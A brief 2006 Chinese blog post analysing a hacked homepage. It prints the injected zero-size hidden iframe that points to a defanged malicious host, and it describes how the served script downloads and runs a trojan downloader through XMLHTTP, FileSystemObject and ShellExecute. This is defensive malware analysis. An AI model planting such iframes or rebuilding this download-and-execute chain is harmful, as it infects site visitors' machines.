本文分析了一个恶意脚本,该脚本通过隐藏的iframe注入并利用Microsoft.XMLHTTP和Scripting.FileSystemObject下载并执行了名为du.exe的文件。此文件被Kaspersky识别为Trojan-Downloader.Win32.Delf.aul。
endurer 原创
2006-08-22 第1版
首页有3处地方被加入:
/--------
<iframe height=0 width=0 src="hxxp://***object.cnic**b.com/15"></iframe>
--------/
hxxp://***object.cnic**b.com/15 的内容为插入许多空格的JavaScript脚本,利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://***object.cnic**b.com/15/du.exe, 保存为 IE临时文件夹中的 test.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
du.exe 采用 nSPack 1.3 加壳。Kaspersky 报为 Trojan-Downloader.Win32.Delf.aul。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
